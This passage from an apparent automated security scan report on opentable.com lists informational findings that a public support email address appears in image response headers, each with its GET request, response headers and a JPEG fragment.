User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1430
Content-Type: image/jpeg
Last-Modified: Tue, 21 Jun 2011 16:55:03 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:48 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...
20.157. http://www.opentable.com/img/restimages/x4/58960.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/58960.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/58960.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1495
Content-Type: image/jpeg
Last-Modified: Thu, 22 Sep 2011 21:42:31 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:04 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.158. http://www.opentable.com/img/restimages/x4/59305.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/59305.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/59305.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1976
Content-Type: image/jpeg
Last-Modified: Thu, 10 Mar 2011 16:03:56 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:43 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...
20.159. http://www.opentable.com/img/restimages/x4/60214.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/60214.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/60214.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1837
Content-Type: image/jpeg
Last-Modified: Fri, 20 May 2011 17:59:21 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:10 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...
20.160. http://www.opentable.com/img/restimages/x4/60505.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/60505.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/60505.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1618
Content-Type: image/jpeg
Last-Modified: Mon, 07 Mar 2011 16:21:42 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:36 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...
20.161. http://www.opentable.com/img/restimages/x4/6189.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/6189.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/6189.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1791
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:25:06 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:38 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.162. http://www.opentable.com/img/restimages/x4/61969.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/61969.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/61969.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1600
Content-Type: image/jpeg
Last-Modified: Tue, 05 Apr 2011 14:37:55 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:04 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...
20.163. http://www.opentable.com/img/restimages/x4/63097.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/63097.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/63097.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1459
Content-Type: image/jpeg
Last-Modified: Tue, 26 Apr 2011 13:35:02 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:36 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...
20.164. http://www.opentable.com/img/restimages/x4/63430.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/63430.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/63430.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1767
Content-Type: image/jpeg
Last-Modified: Mon, 25 Apr 2011 22:27:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:35 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...
20.165. http://www.opentable.com/img/restimages/x4/65959.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/65959.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/65959.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1678
Content-Type: image/jpeg
Last-Modified: Thu, 08 Sep 2011 15:07:54 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:39 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...
20.166. http://www.opentable.com/img/restimages/x4/67378.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/67378.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/67378.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1633
Content-Type: image/jpeg
Last-Modified: Fri, 15 Jul 2011 19:07:39 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:35 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...
20.167. http://www.opentable.com/img/restimages/x4/68701.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/68701.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/68701.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1781
Content-Type: image/jpeg
Last-Modified: Tue, 02 Aug 2011 18:25:26 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:10 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...
20.168. http://www.opentable.com/img/restimages/x4/70561.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/70561.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/70561.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1555
Content-Type: image/jpeg
Last-Modified: Thu, 01 Sep 2011 16:42:18 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:14 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...
20.169. http://www.opentable.com/img/restimages/x4/7764.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/7764.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/7764.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1857
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:25:36 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:10 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...
20.170. http://www.opentable.com/img/restimages/x6/15202.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x6/15202.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x6/15202.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2719
Content-Type: image/jpeg
Last-Modified: Wed, 17 Nov 2010 01:27:58 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:12 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......T.N.."..............................
...[SNIP]...
20.171. http://www.opentable.com/img/restimages/x6/21835.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x6/21835.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x6/21835.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2372
Content-Type: image/jpeg
Last-Modified: Fri, 12 Nov 2010 23:51:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:32 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......T.N.."..............................
...[SNIP]...
20.172. http://www.opentable.com/img/restimages/x6/3644.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x6/3644.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x6/3644.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2936
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:22:58 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:12 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......R.N.."..............................
...[SNIP]...
20.173. http://www.opentable.com/img/restimages/x6/46198.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x6/46198.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x6/46198.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2395
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:24:16 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:31 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......T.N.."..............................
...[SNIP]...
20.174. http://www.opentable.com/img/restimages/x6/63817.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x6/63817.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x6/63817.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2149
Content-Type: image/jpeg
Last-Modified: Wed, 04 May 2011 18:24:20 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
